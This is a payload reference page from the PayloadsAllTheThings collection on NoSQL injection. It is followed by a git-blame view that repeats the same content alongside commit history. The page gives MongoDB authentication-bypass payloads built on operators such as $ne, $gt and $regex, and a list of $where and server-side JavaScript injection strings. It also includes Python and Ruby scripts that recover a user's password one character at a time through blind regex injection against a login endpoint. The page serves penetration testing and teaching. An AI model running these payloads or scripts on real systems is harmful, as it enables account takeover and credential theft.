PayloadsAllTheThings/NoSQL Injection/README.md

# NoSQL Injection

> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.

## Summary

* [Tools](#tools)
* [Exploit](#exploits)
    * [Authentication Bypass](#authentication-bypass)
    * [Extract length information](#extract-length-information)
    * [Extract data information](#extract-data-information)
* [Blind NoSQL](#blind-nosql)
    * [POST with JSON body](#post-with-json-body)
    * [POST with urlencoded body](#post-with-urlencoded-body)
    * [GET](#get)
* [MongoDB Payloads](#mongodb-payloads)
* [References](#references)

## Tools

* [codingo/NoSQLmap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool
* [digininja/nosqlilab](https://github.com/digininja/nosqlilab) - A lab for playing with NoSQL Injection
* [matrix/Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner) - This extension provides a way to discover NoSQL injection vulnerabilities. 


## Exploit

### Authentication Bypass

Basic authentication bypass using not equal ($ne) or greater ($gt)

* in HTTP data
  ```ps1
  username[$ne]=toto&password[$ne]=toto
  login[$regex]=a.*&pass[$ne]=lol
  login[$gt]=admin&login[$lt]=test&pass[$ne]=1
  login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
  ```

* in JSON data
  ```json
  {"username": {"$ne": null}, "password": {"$ne": null}}
  {"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
  {"username": {"$gt": undefined}, "password": {"$gt": undefined}}
  {"username": {"$gt":""}, "password": {"$gt":""}}
  ```


### Extract length information

```ps1
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```

### Extract data information

Extract data with "`$regex`" query operator.

* HTTP data
  ```ps1
  username[$ne]=toto&password[$regex]=m.{2}
  username[$ne]=toto&password[$regex]=md.{1}
  username[$ne]=toto&password[$regex]=mdp

  username[$ne]=toto&password[$regex]=m.*
  username[$ne]=toto&password[$regex]=md.*
  ```

* JSON data
  ```json
  {"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
  {"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
  {"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
  ```

Extract data with "`$in`" query operator.

```json
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
```


## Blind NoSQL

### POST with JSON body

Python script:

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/json'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|']:
            payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            if 'OK' in r.text or r.status_code == 302:
                print("Found one more char : %s" % (password+c))
                password += c
```

### POST with urlencoded body

Python script:

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username="admin"
password=""
u="http://example.org/login"
headers={'content-type': 'application/x-www-form-urlencoded'}

while True:
    for c in string.printable:
        if c not in ['*','+','.','?','|','&','$']:
            payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)
            r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
            if r.status_code == 302 and r.headers['Location'] == '/dashboard':
                print("Found one more char : %s" % (password+c))
                password += c
```

### GET

python script:

```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()

username='admin'
password=''
u='http://example.org/login'

while True:
  for c in string.printable:
    if c not in ['*','+','.','?','|', '#', '&', '$']:
      payload=f"?username={username}&password[$regex]=^{password + c}"
      r = requests.get(u + payload)
      if 'Yeah' in r.text:
        print(f"Found one more char : {password+c}")
        password += c
```

Ruby script:

```ruby
require 'httpx'

username = 'admin'
password = ''
url = 'http://example.org/login'
# CHARSET = (?!..?~).to_a # all ASCII printable characters
CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-'
GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$']
session = HTTPX.plugin(:persistent)

while true
  CHARSET.each do |c|
    unless GET_EXCLUDE.include?(c)
      payload = "?username=#{username}&password[$regex]=^#{password + c}"
      res = session.get(url + payload)
      if res.body.to_s.match?('Yeah')
        puts "Found one more char : #{password + c}"
        password += c
      end
    end
  end
end
```


## MongoDB Payloads

```bash
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';return 'a'=='a' && ''=='
";return(true);var xyz='a
0;return true
```


## References

- [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)
- [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)
- [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)
- [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)
- [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)
- [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)
Normalize Titles 2022-10-12 10:13:55 +00:00			`# NoSQL Injection`
Markdown formatting update 2018-08-12 21:30:22 +00:00
MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00			`> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.`

			`## Summary`

			`* [Tools](#tools)`
little changes - fix exploits ToC anchor - add nosqlilab 2019-10-09 14:53:34 +00:00			`* [Exploit](#exploits)`
References updated for NoSQL, OAuth, ORM, Prompt, RegEx 2024-11-07 15:20:58 +00:00			`* [Authentication Bypass](#authentication-bypass)`
			`* [Extract length information](#extract-length-information)`
			`* [Extract data information](#extract-data-information)`
MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00			`* [Blind NoSQL](#blind-nosql)`
References updated for NoSQL, OAuth, ORM, Prompt, RegEx 2024-11-07 15:20:58 +00:00			`* [POST with JSON body](#post-with-json-body)`
			`* [POST with urlencoded body](#post-with-urlencoded-body)`
			`* [GET](#get)`
MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00			`* [MongoDB Payloads](#mongodb-payloads)`
			`* [References](#references)`

			`## Tools`

References updated for NoSQL, OAuth, ORM, Prompt, RegEx 2024-11-07 15:20:58 +00:00			`* [codingo/NoSQLmap](https://github.com/codingo/NoSQLMap) - Automated NoSQL database enumeration and web application exploitation tool`
			`* [digininja/nosqlilab](https://github.com/digininja/nosqlilab) - A lab for playing with NoSQL Injection`
			`* [matrix/Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner) - This extension provides a way to discover NoSQL injection vulnerabilities.`
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`## Exploit`

MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00			`### Authentication Bypass`

Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`Basic authentication bypass using not equal ($ne) or greater ($gt)`
Markdown formatting update 2018-08-12 21:30:22 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`* in HTTP data`
			```ps1
			`username[$ne]=toto&password[$ne]=toto`
			`login[$regex]=a.*&pass[$ne]=lol`
			`login[$gt]=admin&login[$lt]=test&pass[$ne]=1`
			`login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto`
			```

			`* in JSON data`
			```json
			`{"username": {"$ne": null}, "password": {"$ne": null}}`
			`{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}`
			`{"username": {"$gt": undefined}, "password": {"$gt": undefined}}`
			`{"username": {"$gt":""}, "password": {"$gt":""}}`
			```

NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00
MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00			`### Extract length information`
Markdown formatting update 2018-08-12 21:30:22 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			```ps1
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			`username[$ne]=toto&password[$regex]=.{1}`
			`username[$ne]=toto&password[$regex]=.{3}`
			```

MS14-068 + /etc/security/opasswd 2019-06-29 15:55:13 +00:00			`### Extract data information`
Markdown formatting update 2018-08-12 21:30:22 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			Extract data with "`$regex`" query operator.
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`* HTTP data`
			```ps1
			`username[$ne]=toto&password[$regex]=m.{2}`
			`username[$ne]=toto&password[$regex]=md.{1}`
			`username[$ne]=toto&password[$regex]=mdp`
Web socket + title capitalization 2019-03-06 23:03:25 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`username[$ne]=toto&password[$regex]=m.*`
			`username[$ne]=toto&password[$regex]=md.*`
			```

			`* JSON data`
			```json
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}`
			`{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}`
			```
Web socket + title capitalization 2019-03-06 23:03:25 +00:00
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			Extract data with "`$in`" query operator.
Added basic SSJI paylods 2022-05-17 04:23:37 +00:00
			```json
IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}`
Added basic SSJI paylods 2022-05-17 04:23:37 +00:00			```

Web socket + title capitalization 2019-03-06 23:03:25 +00:00
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`## Blind NoSQL`
Markdown formatting update 2018-08-12 21:30:22 +00:00
add nosqli GET example 2019-04-21 11:00:16 +00:00			`### POST with JSON body`

IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`Python script:`
add nosqli GET example 2019-04-21 11:00:16 +00:00
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`
add nosqli GET example 2019-04-21 11:00:16 +00:00			`u="http://example.org/login"`
add JSON headers 2019-04-24 20:59:24 +00:00			`headers={'content-type': 'application/json'}`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00
			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|']:`
			`payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)`
Added an alternate possible Found condition to POST 2019-10-29 19:11:56 +00:00			`r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)`
			`if 'OK' in r.text or r.status_code == 302:`
Traversal Dir + NoSQL major updates + small addons 2018-02-15 22:27:42 +00:00			`print("Found one more char : %s" % (password+c))`
			`password += c`
NOSQL injection added + updates XSS/XXE 2016-10-30 11:53:32 +00:00			```

NoSQLi: add POST with urlencoded body 2021-11-07 16:49:50 +00:00			`### POST with urlencoded body`

IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`Python script:`
Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script 2022-09-22 22:36:41 +00:00
NoSQLi: add POST with urlencoded body 2021-11-07 16:49:50 +00:00			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username="admin"`
			`password=""`
			`u="http://example.org/login"`
			`headers={'content-type': 'application/x-www-form-urlencoded'}`

			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|','&','$']:`
			`payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c)`
			`r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)`
			`if r.status_code == 302 and r.headers['Location'] == '/dashboard':`
			`print("Found one more char : %s" % (password+c))`
			`password += c`
			```

add nosqli GET example 2019-04-21 11:00:16 +00:00			`### GET`

Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script 2022-09-22 22:36:41 +00:00			`python script:`

add nosqli GET example 2019-04-21 11:00:16 +00:00			```python
			`import requests`
			`import urllib3`
			`import string`
			`import urllib`
			`urllib3.disable_warnings()`

			`username='admin'`
			`password=''`
			`u='http://example.org/login'`

			`while True:`
			`for c in string.printable:`
			`if c not in ['*','+','.','?','\|', '#', '&', '$']:`
Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script 2022-09-22 22:36:41 +00:00			`payload=f"?username={username}&password[$regex]=^{password + c}"`
add nosqli GET example 2019-04-21 11:00:16 +00:00			`r = requests.get(u + payload)`
			`if 'Yeah' in r.text:`
Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script 2022-09-22 22:36:41 +00:00			`print(f"Found one more char : {password+c}")`
			`password += c`
			```

IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00			`Ruby script:`
Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script 2022-09-22 22:36:41 +00:00
			```ruby
			`require 'httpx'`

			`username = 'admin'`
			`password = ''`
			`url = 'http://example.org/login'`
			`# CHARSET = (?!..?~).to_a # all ASCII printable characters`
			`CHARSET = ['0'..'9','a'..'z','-'] # alphanumeric + '-'`
			`GET_EXCLUDE = ['*','+','.','?','\|', '#', '&', '$']`
			`session = HTTPX.plugin(:persistent)`

			`while true`
			`CHARSET.each do \|c\|`
			`unless GET_EXCLUDE.include?(c)`
			`payload = "?username=#{username}&password[$regex]=^#{password + c}"`
			`res = session.get(url + payload)`
			`if res.body.to_s.match?('Yeah')`
			`puts "Found one more char : #{password + c}"`
add nosqli GET example 2019-04-21 11:00:16 +00:00			`password += c`
Blind NoSQL scripts - add missing menu item - use better string interpolation for python script - add ruby script 2022-09-22 22:36:41 +00:00			`end`
			`end`
			`end`
			`end`
add nosqli GET example 2019-04-21 11:00:16 +00:00			```

IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00
Methodology updated with RPCClient, User enumeration 2017-05-17 18:40:45 +00:00			`## MongoDB Payloads`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```bash
Methodology updated with RPCClient, User enumeration 2017-05-17 18:40:45 +00:00			`true, $where: '1 == 1'`
			`, $where: '1 == 1'`
			`$where: '1 == 1'`
			`', $where: '1 == 1'`
			`1, $where: '1 == 1'`
			`{ $ne: 1 }`
			`', $or: [ {}, { 'a':'a`
			`' } ], $comment:'successful MongoDB injection'`
			`db.injection.insert({success:1});`
			`db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1`
			`\|\| 1==1`
			`' && this.password.match(/.*/)//+%00`
			`' && this.passwordzz.match(/.*/)//+%00`
			`'%20%26%26%20this.password.match(/.*/)//+%00`
			`'%20%26%26%20this.passwordzz.match(/.*/)//+%00`
			`{$gt: ''}`
			`[$ne]=1`
Added basic SSJI paylods 2022-05-17 04:23:37 +00:00			`';return 'a'=='a' && ''=='`
			`";return(true);var xyz='a`
			`0;return true`
Methodology updated with RPCClient, User enumeration 2017-05-17 18:40:45 +00:00			```

IIS MachineKeys + CI/CD + CSPT + ORM leak 2024-08-26 09:27:47 +00:00
Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
References updated for NoSQL, OAuth, ORM, Prompt, RegEx 2024-11-07 15:20:58 +00:00			`- [Burp-NoSQLiScanner - matrix - January 30, 2021](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java)`
			`- [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat - February 22, 2015](https://www.dailysecurity.fr/nosql-injections-classique-blind/)`
			`- [MongoDB NoSQL Injection with Aggregation Pipelines - Soroush Dalili (@irsdl) - June 23, 2024](https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/)`
			`- [NoSQL Injection in MongoDB - Zanon - July 17, 2016](https://zanon.io/posts/nosql-injection-in-mongodb)`
			`- [NoSQL injection wordlists - cr0hn - May 5, 2021](https://github.com/cr0hn/nosqlinjection_wordlists)`
			`- [Testing for NoSQL injection - OWASP - May 2, 2023](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection)`